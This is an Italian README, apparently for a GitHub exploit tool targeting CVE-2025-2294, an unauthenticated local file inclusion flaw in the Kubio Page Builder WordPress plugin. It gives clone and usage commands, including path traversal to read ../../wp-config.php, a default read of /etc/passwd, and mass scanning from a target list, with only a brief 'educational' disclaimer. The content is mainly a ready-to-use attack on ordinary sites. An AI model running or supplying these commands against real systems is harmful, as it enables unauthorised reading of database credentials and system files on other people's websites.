
Exploit di Local File Inclusion (LFI) per il plugin WordPress Kubio Page Builder (versioni ≤ 2.5.1).
Questo strumento sfrutta una vulnerabilità LFI non autenticata nel plugin Kubio Page Builder (CVE-2025-2294), consentendo agli attaccanti di leggere file sensibili su installazioni WordPress vulnerabili.
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
Questo strumento è solo a scopo didattico. Lo sviluppatore non è responsabile per qualsiasi uso improprio. Ottenere sempre la dovuta autorizzazione prima di testare qualsiasi sistema.
| Opzione | Descrizione |
|---|
-u, --url | URL del singolo target |
-l, --list | File contenente l'elenco dei target |
-f, --file | File da leggere (default: /etc/passwd) |
-o, --output | Salva i target vulnerabili su file |